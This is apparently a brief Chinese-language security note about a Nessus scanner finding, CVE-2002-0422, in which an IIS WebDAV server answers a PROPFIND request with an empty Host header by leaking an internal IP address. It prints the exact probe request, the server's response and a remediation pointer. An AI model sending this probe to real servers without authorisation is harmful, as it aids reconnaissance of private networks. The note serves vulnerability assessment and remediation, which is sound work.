Title:Web Server PROPFIND Method internal IP Discosure --2012-11-09 09:47
Nessus扫描出来一个安全缺陷,Web Server PROPFIND Method internal IP Discosure,CVE-2002-0422
用HTTP的PROPFIND方法,HOST为空,提交,会暴露真实WEB服务器内网的IP地址。
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0422
请求:
--------------------------------------------------------------
PROPFIND / HTTP/1.1
Host:
Content-Length: 0
--------------------------------------------------------------
回执:
--------------------------------------------------------------
HTTP/1.1 207 Multi-Status
Date: Fri, 09 Nov 2012 01:15:05 GMT
Server: *****************
X-Powered-By: ASP.NET
Content-Type: text/xml
Transfer-Encoding: chunked
2fb
<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response><a:href>http://192.168.2.3/images/</a:href><a:propstat><a:status>HTTP/1.1 200 OK</a:status><a:prop><a:getcontentlength b:dt="int">0</a:getcontentlength><a:creationdate b:dt="dateTime.tz">2009-09-29T07:13:21.356Z</a:creationdate><a:displayname>images</a:displayname><a:getetag>"2ddfaf54d440ca1:1d28"</a:getetag><a:getlastmodified b:dt="dateTime.rfc1123">Tue, 29 Sep 2009 07:13:23 GMT</a:getlastmodified><a:resourcetype><a:collection/></a:resourcetype><a:supportedlock/><a:ishidden b:dt="boolean">0</a:ishidden><a:iscollection b:dt="boolean">1</a:iscollection><a:getcontenttype/></a:prop></a:propstat></a:response></a:multistatus>
0
--------------------------------------------------------------
如图:
Synopsis(简介): This web server leaks a private IP address through its WebDAV interface.
Description (描述):The remote installation of IIS leaks a private IP address through the WebDAV interface. This may expose internal IP addresses that are usually hidden or masked behind a Network Address Translation (NAT) Firewall or proxy server. This is typical of IIS installations that are not configured properly.
Solution (解决方法):Consult Microsoft's KB article for steps to resolve the issue.